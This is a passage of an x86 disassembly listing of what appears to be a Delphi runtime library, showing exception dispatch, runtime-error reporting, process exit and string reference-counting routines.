retn
sub_4000409C endp
; =============== S U B R O U T I N E =======================================
sub_400040B8 proc near ; CODE XREF: .text:loc_400044A5�p
push eax
push edx
cmp byte_4001A028, 1
jbe short loc_400040D3
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_4001C014
loc_400040D3: ; CODE XREF: sub_400040B8+9�j
pop edx
pop eax
retn
sub_400040B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400040D8 proc near ; CODE XREF: sub_40003F59�j
; sub_40003F88:loc_40003FB7�j ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_24 = dword ptr 28h
mov eax, [esp+arg_0]
test dword ptr [eax+4], 6
jnz loc_400041FC
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_40004165
cld
call sub_40003C58
mov edx, ds:off_4001C010
test edx, edx
jz loc_400041FC
call edx ; sub_4000B654
test eax, eax
jz loc_400041FC
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_4000415C
call sub_40004004
cmp byte_4001A02C, 0
jbe short loc_4000415C
cmp byte_4001A028, 0
ja short loc_4000415C
lea ecx, [esp+arg_0]
push eax
push ecx
call sub_40001190 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_400041FC
mov edx, eax
mov eax, [esp+arg_0]
mov ecx, [eax+0Ch]
jmp short loc_4000418C
; ---------------------------------------------------------------------------
loc_4000415C: ; CODE XREF: sub_400040D8+4B�j
; sub_400040D8+59�j ...
mov edx, eax
mov eax, [esp+arg_0]
mov ecx, [eax+0Ch]
loc_40004165: ; CODE XREF: sub_400040D8+1D�j
cmp byte_4001A02C, 1
jbe short loc_4000418C
cmp byte_4001A028, 0
ja short loc_4000418C
push eax
lea eax, [esp+4+arg_0]
push edx
push ecx
push eax
call sub_40001190 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_400041FC
loc_4000418C: ; CODE XREF: sub_400040D8+82�j
; sub_400040D8+94�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_4]
push 0
push eax
push offset loc_400041B0
push edx
call ds:off_4001C018
loc_400041B0: ; DATA XREF: sub_400040D8+CC�o
mov edi, [esp+arg_24]
call sub_40006428
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset loc_400041DC
add ebx, 5
call sub_40004040
jmp ebx
; ---------------------------------------------------------------------------
loc_400041DC: ; DATA XREF: sub_400040D8+F3�o
jmp sub_400042AC
; ---------------------------------------------------------------------------
call sub_40006428
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_40003CE8
; ---------------------------------------------------------------------------
loc_400041FC: ; CODE XREF: sub_400040D8+B�j
; sub_400040D8+2D�j ...
mov eax, 1
retn
sub_400040D8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_40016280
loc_40004204: ; CODE XREF: sub_40003B94:loc_40003C05�j
; sub_40003D9C:loc_40003E20�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jz loc_400042A4
push ebx
xor ebx, ebx
push esi
push edi
push ebp
push ebp
push offset sub_40004284
push dword ptr fs:[ebx]
mov fs:[ebx], esp
mov ebx, fs:[ebx]
mov edx, [eax+18h]
mov ecx, [eax+14h]
push ebx
push eax
push edx
push ecx
mov edi, [esp+28h+arg_4]
call sub_40006428
push dword ptr [eax+0]
mov [eax+0], esp
mov ecx, [edi+4]
mov ebp, [edi+8]
mov dword ptr [edi+4], offset sub_40004284
add ecx, 5
call sub_40004074
call ecx
call sub_40006428
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
add esp, 14h
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
pop ebp
pop edi
pop esi
pop ebx
jmp short loc_400042A4
; END OF FUNCTION CHUNK FOR sub_40016280
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40004284 proc near ; DATA XREF: sub_40016280-12064�o
; sub_40016280-12031�o
jmp sub_400042AC
sub_40004284 endp
; ---------------------------------------------------------------------------
call sub_40006428
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_40003CE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40016280
loc_400042A4: ; CODE XREF: sub_40016280-12071�j
; sub_40016280-11FFE�j
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_40016280
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400042AC proc near ; CODE XREF: sub_400040D8:loc_400041DC�j
; sub_40004284�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov edx, [esp+arg_4]
test dword ptr [eax+4], 6
jz short loc_400042DC
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_400042DC
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_40004074
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_400042DC: ; CODE XREF: sub_400042AC+F�j
; DATA XREF: sub_400042AC+14�o
mov eax, 1
retn
sub_400042AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400042E4 proc near ; CODE XREF: sub_40007998+19�p
; sub_4000B2B0+49�j ...
or eax, eax
jnz short loc_400042F2
mov eax, 0D8h
call sub_40004878
; ---------------------------------------------------------------------------
loc_400042F2: ; CODE XREF: sub_400042E4+2�j
pop edx
push esp
push ebp
push edi
push esi
push ebx
push eax
push edx
push esp
push 7
push 1
push 0EEDFADEh
push edx
jmp ds:off_4001C014
sub_400042E4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4000430C proc near ; CODE XREF: .text:loc_40003F77�p
; sub_40003F88+3E�p ...
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_40004357
call sub_40006428
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_40004346
mov eax, [edx+8]
call sub_40003CE8
call sub_40003FE8
loc_40004346: ; CODE XREF: sub_4000430C+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_40004357: ; DATA XREF: sub_4000430C+4�o
mov eax, 1
retn
sub_4000430C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40004360 proc near ; CODE XREF: sub_40003F88+43�p
; sub_40004518+58�p ...
arg_2C = dword ptr 30h
call sub_40006428
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_40003CE8
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_4000409C
jmp edx
sub_40004360 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_40004390: ; CODE XREF: .text:40004490�j
; .text:4000449C�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_400043CB
jz short loc_400043FD
cmp eax, 0C000008Eh
jg short loc_400043BD
jz short loc_40004401
sub eax, 0C0000005h
jz short loc_4000440D
sub eax, 87h
jz short loc_400043F5
dec eax
jz short loc_40004409
jmp short loc_4000441D
; ---------------------------------------------------------------------------
loc_400043BD: ; CODE XREF: .text:400043A6�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_400043FD
jz short loc_400043F9
jmp short loc_4000441D
; ---------------------------------------------------------------------------
loc_400043CB: ; CODE XREF: .text:4000439D�j
cmp eax, 0C0000096h
jg short loc_400043E3
jz short loc_40004411
sub eax, 0C0000093h
jz short loc_40004409
dec eax
jz short loc_400043F1
dec eax
jz short loc_40004405
jmp short loc_4000441D
; ---------------------------------------------------------------------------
loc_400043E3: ; CODE XREF: .text:400043D0�j
sub eax, 0C00000FDh
jz short loc_40004419
sub eax, 3Dh
jz short loc_40004415
jmp short loc_4000441D
; ---------------------------------------------------------------------------
loc_400043F1: ; CODE XREF: .text:400043DC�j
mov al, 0C8h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_400043F5: ; CODE XREF: .text:400043B6�j
mov al, 0C9h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_400043F9: ; CODE XREF: .text:400043C7�j
mov al, 0CDh
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_400043FD: ; CODE XREF: .text:4000439F�j
; .text:400043C5�j
mov al, 0CFh
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004401: ; CODE XREF: .text:400043A8�j
mov al, 0C8h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004405: ; CODE XREF: .text:400043DF�j
mov al, 0D7h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004409: ; CODE XREF: .text:400043B9�j
; .text:400043D9�j
mov al, 0CEh
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_4000440D: ; CODE XREF: .text:400043AF�j
mov al, 0D8h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004411: ; CODE XREF: .text:400043D2�j
mov al, 0DAh
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004415: ; CODE XREF: .text:400043ED�j
mov al, 0D9h
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_40004419: ; CODE XREF: .text:400043E8�j
mov al, 0CAh
jmp short loc_4000441F
; ---------------------------------------------------------------------------
loc_4000441D: ; CODE XREF: .text:400043BB�j
; .text:400043C9�j ...
mov al, 0FFh
loc_4000441F: ; CODE XREF: .text:400043F3�j
; .text:400043F7�j ...
movzx eax, al
mov edx, [edx+0Ch]
call sub_40002CF8
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_40004430: ; DATA XREF: sub_400044D0+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_400044CA
cmp byte_4001A028, 0
ja short loc_40004459
lea eax, [esp+4]
push eax
call sub_40001190 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_400044CA
loc_40004459: ; CODE XREF: .text:40004448�j
mov eax, [esp+4]
cld
call sub_40003C58
mov edx, [esp+8]
push 0
push eax
push offset loc_40004476
push edx
call ds:off_4001C018
loc_40004476: ; DATA XREF: .text:4000446A�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_400044A5
mov edx, ds:off_4001C010
test edx, edx
jz loc_40004390
mov eax, ebx
call edx ; sub_4000B654
test eax, eax
jz loc_40004390
mov edx, [ebx+0Ch]
loc_400044A5: ; CODE XREF: .text:40004486�j
call sub_400040B8
mov ecx, ds:off_4001C004
test ecx, ecx
jz short loc_400044B6
call ecx ; sub_4000B71C
loc_400044B6: ; CODE XREF: .text:400044B2�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_40004878
; ---------------------------------------------------------------------------
loc_400044CA: ; CODE XREF: .text:4000443B�j
; .text:40004457�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400044D0 proc near ; CODE XREF: sub_400045E4+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_40004430
mov [eax+8], ebp
mov ds:dword_4001E7CC, eax
retn
sub_400044D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400044F0 proc near ; CODE XREF: sub_40004790:loc_4000481D�p
xor edx, edx
mov eax, ds:dword_4001E7CC
test eax, eax
jz short locret_40004517
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_4000450A
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_40004508: ; CODE XREF: sub_400044F0+21�j
mov ecx, [ecx]
loc_4000450A: ; CODE XREF: sub_400044F0+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_40004517
cmp [ecx], eax
jnz short loc_40004508
mov eax, [eax]
mov [ecx], eax
locret_40004517: ; CODE XREF: sub_400044F0+9�j
; sub_400044F0+1D�j
retn
sub_400044F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40004518 proc near ; CODE XREF: sub_40004518+4E�p
; sub_4000457C+52�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, ds:off_4001E7D0
test eax, eax
jz short loc_40004575
mov ebx, ds:dword_4001E7D4
mov edi, [eax+4]
xor eax, eax
push ebp
push offset loc_40004561
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jle short loc_40004557
loc_40004542: ; CODE XREF: sub_40004518+3D�j
dec ebx
mov ds:dword_4001E7D4, ebx
mov esi, [edi+ebx*8+4]
test esi, esi
jz short loc_40004553
call esi
loc_40004553: ; CODE XREF: sub_40004518+37�j
test ebx, ebx
jg short loc_40004542
loc_40004557: ; CODE XREF: sub_40004518+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_40004575
; ---------------------------------------------------------------------------
loc_40004561: ; DATA XREF: sub_40004518+1B�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
call sub_40004518
call sub_4000430C
call sub_40004360
loc_40004575: ; CODE XREF: sub_40004518+D�j
; sub_40004518+47�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40004518 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000457C proc near ; CODE XREF: sub_400045E4+3A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, ds:off_4001E7D0
test eax, eax
jz short loc_400045DD
mov edi, [eax]
xor ebx, ebx
mov eax, [eax+4]
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_400045C9
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp edi, ebx
jle short loc_400045BF
loc_400045A8: ; CODE XREF: sub_4000457C+41�j
mov eax, [ebp+var_4]
mov esi, [eax+ebx*8]
inc ebx
mov ds:dword_4001E7D4, ebx
test esi, esi
jz short loc_400045BB
call esi
loc_400045BB: ; CODE XREF: sub_4000457C+3B�j
cmp edi, ebx
jg short loc_400045A8
loc_400045BF: ; CODE XREF: sub_4000457C+2A�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_400045DD
; ---------------------------------------------------------------------------
loc_400045C9: ; DATA XREF: sub_4000457C+1D�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
call sub_40004518
call sub_4000430C
call sub_40004360
loc_400045DD: ; CODE XREF: sub_4000457C+E�j
; sub_4000457C+4B�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000457C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400045E4 proc near ; CODE XREF: sub_40006474+3A�p
mov ds:off_4001C014, offset sub_40001168
mov ds:off_4001C018, offset sub_40001178
mov ds:off_4001E7D0, eax
xor eax, eax
mov ds:dword_4001E7D4, eax
mov ds:off_4001E7D8, edx
mov eax, [edx+4]
mov ds:dword_4001C030, eax
call sub_400044D0
mov ds:byte_4001C038, 0
call sub_4000457C
retn
sub_400045E4 endp
; =============== S U B R O U T I N E =======================================
sub_40004624 proc near ; CODE XREF: sub_400190AC+1F�p
push ebx
xor ebx, ebx
push edi
push esi
mov edi, [eax+ebx]
lea esi, [eax+ebx+4]
loc_40004630: ; CODE XREF: sub_40004624+1F�j
mov eax, [esi+4]
mov edx, [esi]
mov eax, [eax+ebx]
add edx, ebx
call sub_400062F0
add esi, 8
dec edi
jnz short loc_40004630
pop esi
pop edi
pop ebx
retn
sub_40004624 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000464C proc near ; CODE XREF: sub_400190AC+29�p
push ebx
xor ebx, ebx
push edi
push esi
mov edi, [eax+ebx]
lea esi, [eax+ebx+4]
loc_40004658: ; CODE XREF: sub_4000464C+1E�j
mov eax, [esi+4]
mov edx, [esi]
mov eax, [eax+ebx]
add eax, [esi+8]
mov [edx+ebx], eax
add esi, 0Ch
dec edi
jnz short loc_40004658
pop esi
pop edi
pop ebx
retn
sub_4000464C endp
; =============== S U B R O U T I N E =======================================
sub_40004670 proc near ; CODE XREF: sub_40004790+31�p
push ebx
push esi
push edi
mov edi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov bl, 10h
mov esi, dword_4001A000
loc_40004680: ; CODE XREF: sub_40004670+32�j
mov eax, esi
mov ecx, 0Ah
cdq
idiv ecx
add dl, 30h
movzx eax, bl
mov [edi+eax], dl
mov ecx, 0Ah
mov eax, esi
cdq
idiv ecx
mov esi, eax
dec ebx
test esi, esi
jnz short loc_40004680
mov bl, 1Ch
mov esi, dword_4001A004
loc_400046AC: ; CODE XREF: sub_40004670+5E�j
mov eax, esi
and eax, 0Fh
movzx eax, byte_4001A7A0[eax]
movzx edx, bl
mov [edi+edx], al
mov ecx, 10h
mov eax, esi
xor edx, edx
div ecx
mov esi, eax
dec ebx
test esi, esi
jnz short loc_400046AC
pop edi
pop esi
pop ebx
retn
sub_40004670 endp
; =============== S U B R O U T I N E =======================================
sub_400046D4 proc near ; CODE XREF: sub_40004790+A1�p
xor eax, eax
xchg eax, dword_4001A000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_4001E7C8
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_400046D4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004704 proc near ; CODE XREF: sub_40004790+36�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_4001C04C, 0
jz short loc_40004765
cmp ds:word_4001C220, 0D7B2h
jnz short loc_4000472D
cmp ds:dword_4001C228, 0
jbe short loc_4000472D
mov eax, offset dword_4001C21C
call ds:dword_4001C238
loc_4000472D: ; CODE XREF: sub_40004704+13�j
; sub_40004704+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_40001160 ; GetStdHandle
push eax
call sub_40001198 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_4000478C
push 0FFFFFFF5h
call sub_40001160 ; GetStdHandle
push eax
call sub_40001198 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_40004765: ; CODE XREF: sub_40004704+8�j
cmp byte_4001A030, 0
jnz short loc_40004781
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_400011B0 ; MessageBoxA
loc_40004781: ; CODE XREF: sub_40004704+68�j
pop edx
retn
sub_40004704 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_4000478C dd 0A0Dh
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40004790 proc near ; CODE XREF: sub_4000486C+5�p
; .itext:40019ADD�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_4001E7C8
mov edi, offset dword_4001C048
cmp byte ptr [ebx+28h], 0
jnz short loc_400047B8
cmp dword ptr [edi], 0
jz short loc_400047B8
loc_400047A9: ; CODE XREF: sub_40004790+26�j
mov eax, [edi]
mov esi, eax
xor eax, eax
mov [edi], eax
call esi
cmp dword ptr [edi], 0
jnz short loc_400047A9
loc_400047B8: ; CODE XREF: sub_40004790+12�j
; sub_40004790+17�j
cmp dword_4001A004, 0
jz short loc_400047D2
call sub_40004670
call sub_40004704
xor eax, eax
mov dword_4001A004, eax
loc_400047D2: ; CODE XREF: sub_40004790+2F�j
; sub_40004790+D2�j
cmp byte ptr [ebx+28h], 2
jnz short loc_400047E6
cmp dword_4001A000, 0
jnz short loc_400047E6
xor eax, eax
mov [ebx+0Ch], eax
loc_400047E6: ; CODE XREF: sub_40004790+46�j
; sub_40004790+4F�j
call sub_40004518
cmp byte ptr [ebx+28h], 1
jbe short loc_400047FA
cmp dword_4001A000, 0
jz short loc_4000481D
loc_400047FA: ; CODE XREF: sub_40004790+5F�j
mov edi, [ebx+10h]
test edi, edi
jz short loc_4000481D
mov eax, edi
call sub_40006194
mov ebp, [ebx+10h]
mov esi, [ebp+10h]
cmp esi, [ebp+4]
jz short loc_4000481D
test esi, esi
jz short loc_4000481D
push esi
call sub_400011C8 ; FreeLibrary
loc_4000481D: ; CODE XREF: sub_40004790+68�j
; sub_40004790+6F�j ...
call sub_400044F0
cmp byte ptr [ebx+28h], 1
jnz short loc_4000482B
call dword ptr [ebx+24h]
loc_4000482B: ; CODE XREF: sub_40004790+96�j
cmp byte ptr [ebx+28h], 0
jz short loc_40004836
call sub_400046D4
loc_40004836: ; CODE XREF: sub_40004790+9F�j
cmp dword ptr [ebx], 0
jnz short loc_40004855
cmp ds:dword_4001C028, 0
jz short loc_4000484A
call ds:dword_4001C028
loc_4000484A: ; CODE XREF: sub_40004790+B2�j
mov eax, dword_4001A000
push eax
call sub_400011A8 ; ExitProcess
loc_40004855: ; CODE XREF: sub_40004790+A9�j
mov eax, [ebx]
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
jmp loc_400047D2
sub_40004790 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4000486C proc near ; CODE XREF: sub_40002CF8+6�p
; sub_40004878+6�j ...
mov dword_4001A000, eax
call sub_40004790
sub_4000486C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40004878 proc near ; CODE XREF: sub_400030B4+14�j
; sub_400042E4+9�p ...
pop dword_4001A004
jmp sub_4000486C
sub_40004878 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40004884 proc near ; CODE XREF: sub_40002FF8+F�p
; sub_40004974+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_400048A6
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_400048A6
lock dec dword ptr [edx-8]
jnz short locret_400048A6
push eax
lea eax, [edx-8]
call sub_40002C3C
pop eax
locret_400048A6: ; CODE XREF: sub_40004884+4�j
; sub_40004884+10�j ...
retn
sub_40004884 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400048A8 proc near ; CODE XREF: sub_40005314+56�p
; sub_40006A2C+7A�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_400048AE: ; CODE XREF: sub_400048A8+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_400048CE
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_400048CE
lock dec dword ptr [edx-8]
jnz short loc_400048CE
lea eax, [edx-8]
call sub_40002C3C
loc_400048CE: ; CODE XREF: sub_400048A8+A�j
; sub_400048A8+16�j ...
add ebx, 4
dec esi
jnz short loc_400048AE
pop esi
pop ebx
retn
sub_400048A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400048D8 proc near ; CODE XREF: sub_40004B50+8�j
; sub_40004B94+6�j ...
test edx, edx
jz short loc_40004900
mov ecx, [edx-8]
inc ecx
jg short loc_400048FC
push eax
push edx
mov eax, [edx-4]
call sub_40004948
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_40002DFC
pop edx
pop eax
jmp short loc_40004900
; ---------------------------------------------------------------------------
loc_400048FC: ; CODE XREF: sub_400048D8+8�j
lock inc dword ptr [edx-8]
loc_40004900: ; CODE XREF: sub_400048D8+2�j
; sub_400048D8+22�j
xchg edx, [eax]
test edx, edx
jz short locret_4000491A
mov ecx, [edx-8]
dec ecx
jl short locret_4000491A
lock dec dword ptr [edx-8]
jnz short locret_4000491A
lea eax, [edx-8]
call sub_40002C3C
locret_4000491A: ; CODE XREF: sub_400048D8+2C�j
; sub_400048D8+32�j ...
retn
sub_400048D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000491C proc near ; CODE XREF: sub_40009414+58�p
; sub_40009590+57�p ...
test edx, edx
jz short loc_4000492A
mov ecx, [edx-8]
inc ecx
jle short loc_4000492A
lock inc dword ptr [edx-8]
loc_4000492A: ; CODE XREF: sub_4000491C+2�j
; sub_4000491C+8�j
xchg edx, [eax]
test edx, edx
jz short locret_40004944
mov ecx, [edx-8]
dec ecx
jl short locret_40004944
lock dec dword ptr [edx-8]
jnz short locret_40004944
lea eax, [edx-8]
call sub_40002C3C
locret_40004944: ; CODE XREF: sub_4000491C+12�j
; sub_4000491C+18�j ...
retn
sub_4000491C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004948 proc near ; CODE XREF: sub_400048D8+F�p
; sub_40004974+B�p ...
test eax, eax
jle short loc_40004970
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_40002C20
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_40004970: ; CODE XREF: sub_40004948+2�j
xor eax, eax
retn
sub_40004948 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004974 proc near ; CODE XREF: sub_40002FF8+2F�p
; sub_400049E0+4E�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_40004948
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_40004995
mov edx, eax
mov eax, esi
call sub_40002DFC
loc_40004995: ; CODE XREF: sub_40004974+16�j
mov eax, ebx
call sub_40004884
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_40004974 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400049A4 proc near ; CODE XREF: sub_400049E0+3B�p
; sub_400049E0+6B�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 0
push edx
push eax
mov eax, [ebp+arg_0]
push eax
push ecx
push 0
mov eax, ds:dword_4001C5BC
push eax
call sub_40001250 ; WideCharToMultiByte
pop ebp
retn 4
sub_400049A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400049C4 proc near ; CODE XREF: sub_4000506C+3B�p
; sub_4000506C+69�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edx
push eax
mov eax, [ebp+arg_0]
push eax
push ecx
push 0
mov eax, ds:dword_4001C5BC
push eax
call sub_40001230 ; MultiByteToWideChar
pop ebp
retn 4
sub_400049C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400049E0 proc near ; CODE XREF: sub_40004AAC:loc_40004ADF�j
; sub_40004B0C:loc_40004B17�j ...
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFFCh
mov esi, ecx
mov [esp+1014h+var_1014], edx
mov edi, eax
test esi, esi
jg short loc_40004A02
mov eax, edi
call sub_40004884
jmp short loc_40004A61
; ---------------------------------------------------------------------------
loc_40004A02: ; CODE XREF: sub_400049E0+17�j
lea ebp, [esi+1]
cmp ebp, 7FFh
jge short loc_40004A35
push esi
lea eax, [esp+1018h+var_1010]
mov ecx, [esp+1018h+var_1014]
mov edx, 0FFFh
call sub_400049A4
mov ebx, eax
test ebx, ebx
jl short loc_40004A35
lea edx, [esp+1014h+var_1010]
mov eax, edi
mov ecx, ebx
call sub_40004974
jmp short loc_40004A61
; ---------------------------------------------------------------------------
loc_40004A35: ; CODE XREF: sub_400049E0+2B�j
; sub_400049E0+44�j
mov ebx, ebp
add ebx, ebx
mov eax, edi
mov edx, ebx
call sub_40004F74
push esi
mov eax, [edi]
mov ecx, [esp+1018h+var_1014]
mov edx, ebx
call sub_400049A4
mov ebx, eax
test ebx, ebx
jge short loc_40004A58
xor ebx, ebx
loc_40004A58: ; CODE XREF: sub_400049E0+74�j
mov eax, edi
mov edx, ebx
call sub_40004F74
loc_40004A61: ; CODE XREF: sub_400049E0+20�j
; sub_400049E0+53�j
add esp, 1004h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400049E0 endp
; =============== S U B R O U T I N E =======================================
sub_40004A6C proc near ; CODE XREF: sub_4000ABA4+8F�p
; sub_4000ABA4+196�p ...
push edx
mov edx, esp
mov ecx, 1
call sub_40004974
pop edx
retn
sub_40004A6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
